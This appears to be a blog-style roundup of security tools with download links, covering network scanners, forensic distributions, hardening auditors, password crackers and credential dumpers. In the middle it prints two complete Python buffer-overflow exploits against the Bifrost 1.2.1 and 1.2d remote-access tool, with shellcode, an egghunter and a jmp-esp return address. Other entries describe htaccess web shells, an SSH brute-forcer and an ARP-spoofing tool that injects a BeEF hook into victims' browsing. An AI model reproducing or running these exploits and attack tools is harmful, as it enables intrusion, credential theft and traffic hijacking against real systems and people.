[zAnti] Android Network Toolkit

Anti consists of 2 parts: The Anti version itself and extendable plugins. Upcoming updates will add functionality, plugins or vulnerabilities/exploits to Anti

Using Anti is very intuitive - on each run, Anti will map your network, scan for active devices and vulnerabilities, and will display the information accordingly: Green led signals an 'Active device', Yellow led signals "Available ports", and Red led signals "Vulnerability found". Also, each device will have an icon representing the type of the device. When finished scanning, Anti will produce an automatic report specifying which vulnerabilities you have or bad practices used, and how to fix each one of them

Download zAnti

[Cansina] Web Content Discovery Application

It takes general available lists of common path and files used by web applications and make URL requests looking back to the server response code. Cansina stores the information in a sqlite database (omitting 404 responses). One for every new url (think this as a kind of projects feature) and the same database for every new payload on the same url.

It aims to be (very) simple and straight to use doing only one thing: Discover content.

The app is far from being finished, probably is poorly coded and I wouldn't recommend it to use in a serious pentesting session.

Lists from fuzzdb are included in this repository for convenience but are not part of the project. You can use whatever list you want.

Features

• Threads (well, processes)
• HTTP/S Proxy support (thanks to requests)
• Data persistance (sqlite3)
• Support for multiextensions list (-e php,asp,aspx,txt...)
• Content inspector (will watch for a specific string inside web page content)
• Skip fake 404 (best as possible)
• Skip by filtering content
• Replacing (for URL fuzzing)
• Reporting tool
• Basic Authentication

Download Cansina

[Exploit] Bifrost 1.2.1 and 1.2d - Remote Buffer OverFlow

Bifrost 1.2.1 - Remote Buffer OverFlow

#!/usr/bin/python2.7
#By : Mohamed Clay
import socket
from time import sleep
from itertools import izip, cycle
import base64
import sys
 
def rc4crypt(data, key):
    x = 0
    box = range(256)
    for i in range(256):
        x = (x + box[i] + ord(key[i % len(key)])) % 256
        box[i], box[x] = box[x], box[i]
    x = 0
    y = 0
    out = []
    for char in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
     
    return ''.join(out)
 
def bif_len(s):
    while len(s)<8:
         s=s+"00"
    return s
 
def header(s):
      a=(s[0]+s[1]).decode("hex")
      a+=(s[2]+s[3]).decode("hex")
      a+=(s[4]+s[5]).decode("hex")
      a+=(s[5]+s[6]).decode("hex")
      return a
 
def random():    
    a=""
    for i in range(0,8):
        a+="A"*1000+"|"
    return a
 
def usage():
 
   print "\n\n\t***************************"
   print "\t*    By : Mohamed Clay    *"
   print "\t*  Bifrost 1.2.1 Exploit  *"
   print "\t***************************\n"
   print "\t  Usage : ./bifrost1.2.1 host port"
   print "\tExample : ./bifrost1.2.1 192.168.1.10 81\n\n"
 
 
if len(sys.argv)!=3:
    usage()
    exit()
 
HOST=sys.argv[1]
PORT=int(sys.argv[2])
 
key="\xA3\x78\x26\x35\x57\x32\x2D\x60\xB4\x3C\x2A\x5E\x33\x34\x72\x00"
 
xor="\xB2\x9C\x51\xBB" # we need this in order to bypass 0046A03E function
eip="\x53\x93\x3A\x7E" # jmp esp User32.dll
 
egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
 
#calc.exe shellcode (badchars "\x00")
 
buf ="\xb8\x75\xd3\x5c\x87\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9"
buf +="\xb1\x33\x31\x43\x12\x83\xeb\xfc\x03\x36\xdd\xbe\x72\x44"
buf +="\x09\xb7\x7d\xb4\xca\xa8\xf4\x51\xfb\xfa\x63\x12\xae\xca"
buf +="\xe0\x76\x43\xa0\xa5\x62\xd0\xc4\x61\x85\x51\x62\x54\xa8"
buf +="\x62\x42\x58\x66\xa0\xc4\x24\x74\xf5\x26\x14\xb7\x08\x26"
buf +="\x51\xa5\xe3\x7a\x0a\xa2\x56\x6b\x3f\xf6\x6a\x8a\xef\x7d"
buf +="\xd2\xf4\x8a\x41\xa7\x4e\x94\x91\x18\xc4\xde\x09\x12\x82"
buf +="\xfe\x28\xf7\xd0\xc3\x63\x7c\x22\xb7\x72\x54\x7a\x38\x45"
buf +="\x98\xd1\x07\x6a\x15\x2b\x4f\x4c\xc6\x5e\xbb\xaf\x7b\x59"
buf +="\x78\xd2\xa7\xec\x9d\x74\x23\x56\x46\x85\xe0\x01\x0d\x89"
buf +="\x4d\x45\x49\x8d\x50\x8a\xe1\xa9\xd9\x2d\x26\x38\x99\x09"
buf +="\xe2\x61\x79\x33\xb3\xcf\x2c\x4c\xa3\xb7\x91\xe8\xaf\x55"
buf +="\xc5\x8b\xed\x33\x18\x19\x88\x7a\x1a\x21\x93\x2c\x73\x10"
buf +="\x18\xa3\x04\xad\xcb\x80\xfb\xe7\x56\xa0\x93\xa1\x02\xf1"
buf +="\xf9\x51\xf9\x35\x04\xd2\x08\xc5\xf3\xca\x78\xc0\xb8\x4c"
buf +="\x90\xb8\xd1\x38\x96\x6f\xd1\x68\xf5\xee\x41\xf0\xd4\x95"
buf +="\xe1\x93\x28"
 
 
raw=(1000-533-len(egghunter))*"\x90"
raw2=(1000-8-len(buf))*"\x41"+"|"
command=30
 
tmp=hex(command).split("0x")[1]
data=tmp.decode("hex")+"F"*2+" "*511+xor+"C"*8+eip+"A"*12+egghunter+raw+"|"+" "*1000+"|"+"w00tw00t"+buf+raw2+random()
out=rc4crypt(data,key)
l=header(bif_len(str(hex(len(data))).split("0x")[1]))
out=l+out
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(out)
print "\n[*] By : Mohamed Clay"
print "[*] Exploit completed\n"

Bifrost 1.2d - Remote Buffer Overflow

#!/usr/bin/python2.7
#By : Mohamed Clay
import socket
from time import sleep
from itertools import izip, cycle
import base64
import threading
import sys
 
def rc4crypt(data, key):
    x = 0
    box = range(256)
    for i in range(256):
        x = (x + box[i] + ord(key[i % len(key)])) % 256
        box[i], box[x] = box[x], box[i]
    x = 0
    y = 0
    out = []
    for char in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
     
    return ''.join(out)
 
def bif_len(s):
    while len(s)<8:
         s=s+"00"
    return s
 
def header(s):
      a=(s[0]+s[1]).decode("hex")
      a+=(s[2]+s[3]).decode("hex")
      a+=(s[4]+s[5]).decode("hex")
      a+=(s[5]+s[6]).decode("hex")
      return a
 
def random():    
    a=""
    for i in range(0,8):
        a+="A"*1000+"|"
    return a
 
 
def exploit():
    s.sendall(out)
 
def usage():
 
   print "\n\n\t***************************"
   print "\t*    By : Mohamed Clay    *"
   print "\t*  Bifrost 1.2d Exploit  *"
   print "\t***************************\n"
   print "\t  Usage : ./bifrost1.2.1 host port"
   print "\tExample : ./bifrost1.2.1 192.168.1.10 81\n\n"
 
 
if len(sys.argv)!=3:
    usage()
    exit()
 
HOST=sys.argv[1]
PORT=int(sys.argv[2])
 
key="\xA3\x78\x26\x35\x57\x32\x2D\x60\xB4\x3C\x2A\x5E\x33\x34\x72\x00"
 
xor="\xB2\x9C\x51\xBB" # we need this in order to bypass 0046A03E function
eip="\x53\x93\x3A\x7E" # jmp esp User32.dll
 
egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
 
#calc.exe shellcode (badchars "\x00")
 
buf ="\xb8\x75\xd3\x5c\x87\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9"
buf +="\xb1\x33\x31\x43\x12\x83\xeb\xfc\x03\x36\xdd\xbe\x72\x44"
buf +="\x09\xb7\x7d\xb4\xca\xa8\xf4\x51\xfb\xfa\x63\x12\xae\xca"
buf +="\xe0\x76\x43\xa0\xa5\x62\xd0\xc4\x61\x85\x51\x62\x54\xa8"
buf +="\x62\x42\x58\x66\xa0\xc4\x24\x74\xf5\x26\x14\xb7\x08\x26"
buf +="\x51\xa5\xe3\x7a\x0a\xa2\x56\x6b\x3f\xf6\x6a\x8a\xef\x7d"
buf +="\xd2\xf4\x8a\x41\xa7\x4e\x94\x91\x18\xc4\xde\x09\x12\x82"
buf +="\xfe\x28\xf7\xd0\xc3\x63\x7c\x22\xb7\x72\x54\x7a\x38\x45"
buf +="\x98\xd1\x07\x6a\x15\x2b\x4f\x4c\xc6\x5e\xbb\xaf\x7b\x59"
buf +="\x78\xd2\xa7\xec\x9d\x74\x23\x56\x46\x85\xe0\x01\x0d\x89"
buf +="\x4d\x45\x49\x8d\x50\x8a\xe1\xa9\xd9\x2d\x26\x38\x99\x09"
buf +="\xe2\x61\x79\x33\xb3\xcf\x2c\x4c\xa3\xb7\x91\xe8\xaf\x55"
buf +="\xc5\x8b\xed\x33\x18\x19\x88\x7a\x1a\x21\x93\x2c\x73\x10"
buf +="\x18\xa3\x04\xad\xcb\x80\xfb\xe7\x56\xa0\x93\xa1\x02\xf1"
buf +="\xf9\x51\xf9\x35\x04\xd2\x08\xc5\xf3\xca\x78\xc0\xb8\x4c"
buf +="\x90\xb8\xd1\x38\x96\x6f\xd1\x68\xf5\xee\x41\xf0\xd4\x95"
buf +="\xe1\x93\x28"
 
 
raw=(1000-533-len(egghunter))*"\x90"
raw2=(1000-8-len(buf))*"\x41"+"|"
command=30
 
 
tmp=hex(command).split("0x")[1]
data=tmp.decode("hex")+"F"*2+" "*511+xor+"C"*12+eip+"A"*8+egghunter+raw+"|"+" "*1000+"|"+"w00tw00t"+buf+raw2+random()
out=rc4crypt(data,key)
l=header(bif_len(str(hex(len(data))).split("0x")[1]))
out=l+out
 
 
data2="2192.168.1.1|Default|Mohamed Clay|Mohamed Clay|p1.2d||0|-1|0|0000|0|1|0|0|000000|C:\|C:\|C:\|MA|00000000|BifrosT v1.2d|"
out2=rc4crypt(data2,key)
l=header(bif_len(str(hex(len(data2))).split("0x")[1]))
out2=l+out2
 
th = threading.Thread(name='exploit', target=exploit)
th.setDaemon(True)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(out2)
th.start()
s.recv(1024)
print "\n[*] By : Mohamed Clay"
print "[*] Exploit completed\n"

Download Bifrost 1.2d - Remote Buffer Overflow

Download Bifrost 1.2.1 - Remote Buffer OverFlow

[DEFT] Distribución linux para análisis forense

DEFT es una reputada distribución que recopila herramientas de análisis forense y que alcanza ya su versión 8.

No se enfoca únicamente al típico análisis forense de discos duros, si no que tendremos la posibilidad también de realizar forenses de red e incluso de dispositivos móviles. Deft v8 está basada en Ubuntu 12.10, y posee un kernel versión 3.5.0-30. Como cualquier tipo de livecd actual, se nos ofrece la opción de instalar la distribución en nuestro disco duro.

Dentro del menú principal de la distribución, nos encontramos las siguientes categorías de herramientas incluidas:

Menú de herramientas de DEFT 8

• Analysis - Herramientas de análisis de ficheros de diferentes tipos
• Antimalware - Búsqueda de rootkits, virus, malware, así como PDFs con código malicioso.
• Data recovery - Software para recuperación de ficheros
• Hashing - Scripts que permiten la realización de cálculo de hashes de determinados procesos (SHA1, SHA256, MD5...)
• Imaging - Aplicaciones que podemos utilizar para realizar los clonados y adquisición de imágenes de discos duros u otras fuentes.
• Mobile Forensics - Análisis de Blackberry, Android, iPhone, así como información sobre las típicas bases de datos de dispositivos móviles en SQLite utilizadas por las aplicaciones.
• Network Forensics - Herramientas para procesamiento de información almacenada en capturas de red
• OSINT - Aplicaciones que facilitan la obtención de información asociada a usuarios y su actividad.
• Password recovery - Recuperación de contraseñas de BIOS, ficheros comprimidos, ofimáticos, fuerza bruta, etc.
• Reporting tools - Por último, dentro de esta sección encontraremos herramientas que nos facilitarán las tareas de generación de informes y obtención de evidencias que nos servirán para documentar el análisis forense. Captura de pantalla, recopilación de notas, registro de actividad del escritorio, etc.

Dentro de estas secciones, encontraréis muchísimas herramientas que evitarán tener que recopilarlas por cuenta propia. El listado completo de paquetes lo tenéis en este enlace. De esta versión última 8, todavía no existe un manual, pero podéis echar un vistazo al manual para la versión 7, si bien su uso es bastante simple y cada herramienta lleva su man asociado.

Por último, destacar la inclusión dentro de esta versión 8 de DART 2, una suite para gestión y respuesta ante incidentes desde sistemas operativos Windows, que incluye un lanzador de aplicaciones a herramientas para este sistema operativo.

Ejecutando DART en sistema operativo Windows

Podréis descargar la distribución en diferentes formatos (imagen ISO, máquina virtual y versión para pendrives USB, entre otros) teniendo disponibles varios mirrors. Sin duda, una livecd que no debe faltar también en nuestro arsenal de cds/usbs para llevar siempre encima.

Descargar DEFT Linux

Fuente

[WiFi Password Remover] Wireless (WEP/WPA/WPA2) Password/Profile Removal Software

WiFi Password Remover is the Free software to quickly recover and remove Wireless account passwords stored on your system.

For each recovered Wi-Fi account, it displays following details, WiFi Name (SSID) Security Settings (WEP-64/WEP-128/WPA2/AES/TKIP) Password Type Password in Hex format Password in clear text

Once recovered, you can either remove single or all of them with just a click. Before proceeding with deletion, you can also take a backup of recovered Wi-Fi password list to HTML/XML/TEXT file. One of the unique feature of this tool is that it can recover all type of Wi-Fi passwords including the ones which are not shown by 'Windows Wireless Manager', thus allowing you to remove all the hidden wireless passwords/profiles also.

Download WiFi Password Remover v1.0

[Lynis v1.3.5] The Unix / Linux auditing, security and hardening Tool

Security and system auditing tool to harden Linux systems (and more)

Lynis is an auditing tool for Unix/Linux. It performs a security scan and determines the hardening state of the machine. Any detected security issues will be provided in the form of a suggestion or warning. Beside security related information it will also scan for general system information, installed packages and possible configuration errors.

This software aims in assisting automated auditing, hardening, software patch management, vulnerability and malware scanning of Unix/Linux based systems. It can be run without prior installation, so inclusion on read only storage is possible (USB stick, cd/dvd).

Lynis assists auditors in performing Basel II, GLBA, HIPAA, PCI DSS and SOx (Sarbanes-Oxley) compliance audits.

Intended audience:
Security specialists, penetration testers, system auditors, system/network managers.

Examples of audit tests:
- Available authentication methods
- Expired SSL certificates
- Outdated software
- User accounts without password
- Incorrect file permissions
- Configuration errors
- Firewall auditing

Current state:
Stable releases are available, development is active.

Background information:

Lynis is an audit script written in the common shell scripting language (sh). Therefore it runs on most systems without any adjustments. Packages are created by several maintainers, for easier installation. Still, if one would like to use the latest version, simply download the tarball, extract it to a temporary directory and run the tool. 

System requirements:

- Compatible operating system (see 'Supported operating systems')

- Default shell

Supported operating systems

Tested on:

- Arch Linux

- CentOS

- Debian

- Fedora Core

- FreeBSD

- Gentoo

- Knoppix

- Linux Mint

- Mac OS X

- Mandriva

- OpenBSD

- OpenSolaris

- OpenSuSE

- Oracle Linux

- PcBSD

- PCLinuxOS

- Red Hat Enterprise Linux (RHEL)

- Red Hat derivatives

- Slackware

- Solaris 10

- Ubuntu

 Download Lynis v1.3.5

[HTSHELLS] Self contained web shells and other attacks via .htaccess files

Attacks are named in the following fashion, module.attack.htaccess and grouped by attack type in directories. Pick the one you need and copy it to a new file named .htaccess, check the file to see if it needs editing before you upload it. Web shells executes commands from the query parameter c, unless the file states otherwise.

Download  HTSHELLS

[Chrome Password Dump] Command-line Tool to Recover Login Password from Google Chrome Browser

Chrome Password Dump is the free command-line tool to quickly recover your lost web login passwords from Google Chrome browser.

It automatically detects the default Chrome profile for current user and recovers all the stored web login passwords.

Alternatively you can also specify the custom profile path in case your Chrome user profile is not in standard location. This is very useful in recovering the login passwords from other Chrome based browsers such as Chrome SXS/Canary, CoolNovo, Flock, Comodo Dragon etc.

Command line interface makes it helpful for Penetration Testers & Forensic investigators.

Download Chrome Password Dump v1.0

[FruityWifi v1.6] the Wireless Network Auditing Tool

FruityWifi is a wireless network auditing tool based in the Wifi Pineapple idea. The application can be installed in any Debian based system. Tested in Debian, Kali Linux, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi), Pwnpi (Raspberry Pi).

With the new version, it is possible to install external modules. This functionality gives the user more flexibility and the FruityWifi can be customized. The modules can be added or removed anytime using the on-line repository.

Available modules:

• Hostapd Karma
• URLsnarf
• DNSspoof
• Kismet
• Squid (code injection capabilities)
• SSLstrip (code injection capabilities)
• nmap
• mdk3
• ngrep
• Captive Portal

New modules are being developed continuously and can be installed from the modules page.

Using the installation script all the required dependencies, scripts and setup can be installed, or if you prefer you can download a SD image of Pwnpi 3.0 with FruityWifi v1.6 from the wiki page: 

https://github.com/xtr4nge/FruityWifi/wiki/Install

Download FruityWifi v1.6

[HashTag] Password Hash Type Identification (Identify Hashes)

HashTag.py is a Python script written to parse and identify the password hash type used.

HashTag supports the identification of over 250 hash types along with matching them to over 110 hashcat modes (use the command line switch -hc to output the hashcat modes). It is also able to identify a single hash, parse a single file and identify the hashes within it, or traverse a root directory and all subdirectories for potential hash files and identify any hashes found.

One of the biggest aspects of this tool is the identification of password hashes. The main attributes used to distinguish between hash types are character set (hexadecimal, alphanumeric, etc.), hash length, hash format (e.g. 32 character hash followed by a colon and a salt), and any specific substrings (e.g. ‘$1$’). A lot of password hash strings can’t be identified as one specific hash type based on these attributes. For example, MD5 and NTLM hashes are both 32 character hexadecimal strings. In these cases the author made an exhaustive list of possible types and has the tool output reflect that.

It has three main arguments:

• Identifying a single hash type (-sh)
• Parsing and identifying multiple hashes from a file (-f)
• Traversing subdirectories to locate files which contain hashes and parse/identify them (-d)

Usage:

HashTag.py {-sh hash |-f file |-d directory} [-o output_filename] [-hc] [-n]

Download HashTag

[pyClamd] Using Clamav with python

pyClamd is a python interface to Clamd (Clamav daemon). By using pyClamd, you can add virus detection capabilities to your python software in an efficient and easy way.

Instead of pyClamav which uses libclamav, pyClamd may be used by a closed source product. 

Download pyClamd

[Tundeep v0.2a] Layer 2 VPN/Injection tool

Tundeep is a layer 2 VPN/injection tool that resides [almost] entirely in user space on the victim aside from the pcap requirement. This can be handled via a silent install however. The tool will build on Linux and Windows victims. Windows compilation is achieved using Cygwin. The attacker must be a Linux machine however as kernel TUN/TAP support is required. It works just fine on Backtrack/Kali.

The purpose of the tool is to allow an attacker to tunnel through a network at layer 2. A TAP interface will be brought up on the attackers machine for each level of the network allowing direct interaction with hosts on the network segment through a compromised victim.

Changelog:

- IPv6 support (-6, -T)
- Compression support (-C) – must be enabled on both sides
- Better error checking and debugging
- Misc bug fixes and code improvements
- Makefile improvements to detect Cygwin/Linux without manual edits
- README updates
- Added default checksum feature (-K disables) – added overhead, improved reliability.

Download Tundeep v0.2a

[iptables-bash_completion] Programmable completion code (bash) for ip[6]tables

This is the programmable completion specification (compspec) for the iptables program (netfilter.org).

Features

• Interactive completion for ip[6]tables.
• This completion specification follows the logic of iptables and will only show commands and options, when they are available for the current context. Providing some kind of interactive help.
• Show and complete matches, targets and builtin and/or user-defined chains.
• Dynamically retrieve, show and complete: set names, services (port-ranges), protocols, active interfaces, cpu numbers, routing realms, user and group names, NFLOG logging groups, tc classes, nfacct names, nfct timeout policy names, genre names of the osf match.
• Show and complete hostnames, ip/network/mac addresses.
• Show and complete various arguments for matches and targets (those which are in any way predictable).
• Some values entered by the user are checked for validity and completion will not continue after an invalid input.
• Environment variables allow to modify completion behaviour.

Download iptables-bash_completion

[ipset_list] ipset set listing wrapper script

Features:

• Calculate sum of set members (and match on that count).
• List only members of a specified set.
• Choose a delimiter character for separating members.
• Show only sets containing a specific (glob matching) header.
• Arithmetic comparison on headers with an integer value.
• Match members using a globbing or regex pattern.
• Suppress listing of (glob matching) sets.
• Suppress listing of (glob matching) headers.
• Suppress listing of members matching a glob or regex pattern.
• Suppress listing of members options.
• Calculate the total size in memory of all matching sets.
• Calculate the amount of matching, excluded and traversed sets.
• Colorize the output.
• Operate on a single, selected, or all sets.
• Programmable completion is included to make usage easier and faster.

Download ipset_list

[OMENS v1.17] The framework for distributing Actionable Intelligence

OMENS (Object Monitor for Enhanced Network Security) was born out of the intrusion (and intrusion attempts) analysis that I have been doing over many years. I consistently run into intrusion attempts that existing IDS systems have difficulty detecting. OMENS is my attempt to better detect (and understand) these blind spots in existing systems.

OMENS uses two primary methods to determine hostile activity. Scanning for hostile activity through signature comparisons, and base-lining to determine if any system changes have taken place.

OMENS is initially targeted at defending web servers, because the author of OMENS is most familiar with web based intrusions. However, the concepts employed by OMENS could be used in many other circumstances.

OMENS starts with scanning the web server log file for hostile activity. If it sees anything that matches the hostile signature database, it will report that activity in a report or via syslog.

OMENS also baselines the web server’s (web root) file system. If any changes are made in the files, those files are then scanned for hostile signatures, and any findings are again reported via report or syslog. One unique feature of OMENS is that it will also scan any modified or new files for obfuscated code. A common indicator of hostile files is that they contain obfuscated code. Obfuscation is commonly used to prevent detection. To my knowledge no existing scanner other than OMENS looks for this important indicator.

OMENS can also check the Windows Registry for hostile keys.

Download OMENS v1.17

[Hashcat v0.46] Multi-Threaded Password Hash Cracking Tool

hashcat claims to be the world’s fastest CPU-based password recovery tool, while not as fast as GPU powered hash brute forcing (like CUDA-Multiforcer), it is still pretty fast.

hashcat was written somewhere in the middle of 2009. Yes, there were already close-to-perfect working tools supporting rule-based attacks like “PasswordsPro”, “John The Ripper”. However for some unknown reason, both of them did not support multi-threading. That was the only reason to write hashcat: To make use of the multiple cores of modern CPUs.

Granted, that was not 100% correct. John the Ripper already supported MPI using a patch, but at that time it worked only for Brute-Force attack. There was no solution available to crack plain MD5 which supports MPI using rule-based attacks.

Hashcat, from its first version, v0.01, was called “atomcrack”. This version was very poor, but at least the MD5 kernel was written in assembler utilizing SSE2 instructions and of course it was multi-threaded. It was a simple dictionary cracker, nothing more. But it was fast. Really fast. Some guys from the scene become interested in it and after one week there were around 10 beta testers. Everything worked fine and so requests for more algorithm types, a rule-engine for mutation of dictionaries, a windows version and different attack modes were added. These developments took around half a year, and were completely non-public.

Features

• Multi-Threaded
• Multi-Hash (up to 24 million hashes)
• Multi-OS (Linux, Windows and OSX native binaries)
• Multi-Algo (MD4, MD5, SHA1, DCC, NTLM, MySQL, …)
• SSE2, AVX and XOP accelerated
• All Attack-Modes except Brute-Force and Permutation can be extended by rules
• Very fast Rule-engine
• Rules compatible with JTR and PasswordsPro
• Possible to resume or limit session
• Automatically recognizes recovered hashes from outfile at startup
• Can automatically generate random rules
• Load saltlist from external file and then use them in a Brute-Force Attack variant
• Able to work in an distributed environment
• Specify multiple wordlists or multiple directories of wordlists
• Number of threads can be configured
• Threads run on lowest priority
• Supports hex-charset
• Supports hex-salt
• 80+ Algorithms implemented with performance in mind

Detailed documentation and command line switches can be found here – hashcat.

Download Hashcat v0.46

OWASP Xenotix XSS Exploit Framework v4.5

Version 4.5 Additions

• JavaScript Beautifier
• Pause and Resume support for Scan
• Jump to Payload
• Cookie Support for POST Request
• Cookie Support and Custom Headers for Header Scanner
• Added TRACE method Support
• Improved Interface
• Better Proxy Support
• WAF Fingerprinting
• Load Files
• Hash Calculator
• Hash Detector

Download OWASP Xenotix XSS Exploit Framework v4.5

[MailPasswordDecryptor] All-in-one Mail Password Recovery Software

Mail Password Decryptor is the FREE software to instantly recover Mail Account passwords from popular email clients and other desktop applications.

You can recover your lost password for email accounts like Gmail, Yahoo Mail, Hotmail or Windows Live Mail from email applications such as Microsoft Outlook, Thunderbird, IncrediMail, GTalk & many more.

MailPasswordDecryptor automatically crawls through each of these applications and instantly recovers all of the stored mail account passwords.

It presents both GUI interface & command line in a single software making it useful for Penetration testers as  well as Forensic investigators.

Current version support password recovery from following Popular email clients & desktop apps

Microsoft Outlook Express Microsoft Outlook 2002/XP/2003/2007/2010/2013 Mozilla Thunderbird Windows Live Mail 2012 IncrediMail Foxmail v6.x - v7.x Windows Live Messenger MSN Messenger GTalk GMail Notifier PaltalkScene IM Pidgin (Formerly Gaim) Messenger Miranda Messenger Windows Credential Manager Download Mail Password Decryptor v3.5

[Beleth] Multi-threaded SSH Password Auditor

Dictionary based SSH cracker

Usage: ./beleth [OPTIONS]
    -c [payload]    Execute payload on remote server once logged in
    -h              Display this help
    -l [threads]    Limit threads to given number. Default: 4
    -p [port]       Specify remote port
    -t [target]     Attempt connections to this server
    -u [user]       Attempt connection using this username
    -v              -v (Show attempts) -vv (Show debugging)
    -w [wordlist]   Use this wordlist. Defaults to wordlist.txt

Example:

$ ./beleth -l 15 -t 127.0.0.1 -u stderr -w wordlist.txt
+-----------------------------------------+
|                 Beleth                  |
|           www.chokepoint.net            |
+-----------------------------------------+
[*] Read 25 passwords from file.
[*] Starting task manager
[*] Spawning 15 threads
[*] Starting attack on root@127.0.0.1:22
[*] Authentication succeeded (root:jesus@127.0.0.1:22)
[*] Executing: uname -a
[*] Linux eclipse 3.2.0-4-686-pae #1 SMP Debian 3.2.46-1+deb7u1 i686 GNU/Linux
[*] Cleaning up child processes.

Download Beleth

[WebSurgery] Web application security testing suite

WebSurgery is a suite of tools for security testing of web applications. It was designed for security auditors to help them with web application planning and exploitation. Suite currently contains a spectrum of efficient, fast and stable web tools (Crawler, Bruteforcer, Fuzzer, Proxy, Editor) and some extra functionality tools (Scripting Filters, List Generator, External Proxy).

Main Tools

Crawler

• High Performance Multi-Threading and Completely Parameterized Crawler
• Extracts Links from HTML / CSS / JavaScript / AJAX / XHR
• Hidden Structure Identification with Embedded Bruteforcer
• Parameterized Timing Settings (Timeout, Threading, Max Data Size, Retries)
• Parameterized Limit Rules (Case Sensitive, Process Above / Below, Dir Depth, Max Same File / Script Parameters / Form Action File)
• Parameterized Extra Rules (Fetch Indexes / Sitemaps, Submit Forms, Custom Headers)
• Supports Advanced Filters with Scripting & Regular Expressions (Process, Exclude, Page Not Found, Search Filters)

Bruteforcer

• High Performance Multi-Threading Bruteforcer for Hidden Structure (Files / Directories)
• Parameterized Timing Settings (Timeout, Threading, Max Data Size, Retries)
• Parameterized Rules (Base Dir, Bruteforce Dirs / Files, Recursive, File Extension, Custom Headers)
• Parameterized Advanced Rules (Send GET / HEAD, Follow Redirects, Process Cookies)
• Supports Advanced Filters with Scripting & Regular Expressions (Page Not Found, Search Filters)
• Supports List Generator with Advanced Rules

Fuzzer

• High Performance Multi-Threading Fuzzer Generates Requests based on Initial Request Template
• Exploitation for (Blind) SQL Injections, Cross Site Scripting (XSS), Denial of Service (DOS), Bruteforce for Username / Password Authentication Login Forms
• Identification of Improper Input Handling and Firewall / Filtering Rules
• Parameterized Timing Settings (Timeout, Threading, Max Data Size, Retries)
• Parameterized Advanced Rules (Follow Redirects, Process Cookies)
• Supports Advanced Filters with Scripting & Regular Expressions (Stop / Reset Level, Search Filters)
• Supports List Generator with Advanced Rules
• Supports Multiple Lists with Different Levels

Proxy

• Proxy Server to Analyze, Intercept and Manipulate Traffic
• Parameterized Listening Interface IP Address & Port Number
• Supports Advanced Filters with Scripting & Regular Expressions (Process, Intercept, Match-Replace, Search Filters)

Editor

• Advanced ASCII / HEX Editor to Manipulate Individual Requests
• Parameterized Timing Settings (Timeout, Max Data Size, Retries)
• Automatically Fix Request (Content-Length, New Lines at End)

Extra Tools

Scripting Filters

• Advanced Scripting Filters to Filter Specific Requests / Responses
• Main Variables (url, proto, hostport, host, port, pathquery, path, query, file, ext)
• Request Variables (size, hsize, dsize, data, hdata, ddata, method, hasparams, isform)
• Response Variables (size, hsize, dsize, data, hdata, ddata, status, hasform)
• Operators =, !=, ~, !~, >=, <=, >, <
• Conjunctions &, |
• Supports Reverse Filters and Parenthesis

List Generator

• List Generator for Different List Types (File, Charset, Numbers, Dates, IP Addresses, Custom)
• Parameterized Rules (Prefix, Suffix, Case, Reverse, Fixed-Length, Match-Replace)
• Parameterized Crypto / Hash Rules (URL, URL All, HTML, BASE-64, ASCII, HEX, MD5, SHA-512)

External Proxy

• External Proxy Redirects Traffic to Another Proxy
• Supports Non-Authenticated Proxies (HTTP, SOCKS4, SOCKS5)
• Supports Authenticated Proxies (HTTP Basic, SOCKS5 Username/Password)
• Supports DNS Lookups at Proxy Side

          

Download WebSurgery

[autosploit] Scripts that combine Nmap and Metasploit

Scripts that will combine Metasploit and Nmap without using Lua.

Download autosploit

[WiFi Password Decryptor] Wireless Password Recovery Software

WiFi Password Decryptor is the FREE software to instantly recover Wireless account passwords stored on your system.

It automatically recovers all type of Wireless Keys/Passwords (WEP/WPA/WPA2 etc) stored by Windows Wireless Configuration Manager. For each recovered WiFi account, it displays following information

WiFi Name (SSID) Security Settings (WEP-64/WEP-128/WPA2/AES/TKIP) Password Type Password in Hex format Password in clear text

After the successful recovery you can save the password list to HTML/XML/TEXT file. You can also right click on any of the displayed account and quickly copy the password. Under the hood, 'WiFi Password Decryptor' uses System Service method (instead of injecting into LSASS.exe) to decrypt the WiFi passwords. This makes it more safer and reliable. Also it makes us to have just single EXE to work on both 32-bit & 64-bit platforms. Download WiFi Password Decryptor v2.5

[LANs.py] Capture and inject traffic on LAN

Multithreaded asynchronous packet parsing/injecting arp spoofer.

Individually arpspoofs the target box, router and DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself.

Prereqs: Linux, scapy, python nfqueue-bindings 0.4.3+, aircrack-ng, python twisted, BeEF (optional), and a wireless card capable of promiscuous mode if you don't use the -ip option

Tested on Kali 1.0. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.


All options:

python LANs.py -h

-b BEEF_HOOK_URL: copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js
-c 'HTML CODE': inject arbitrary html code into pages the victim visits; include the quotes when selecting HTML to inject
-d: open an xterm with driftnet to see all images they view
-dns DOMAIN: spoof the DNS of DOMAIN. e.g. -dns facebook.com will DNS spoof every DNS request to facebook.com or subdomain.facebook.com
-u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg urls since they spam the output and are uninteresting
-i INTERFACE: specify interface; default is first interface in ip route, eg: -i wlan0
-ip: target this IP address
-n: performs a quick nmap scan of the target
-na: performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt
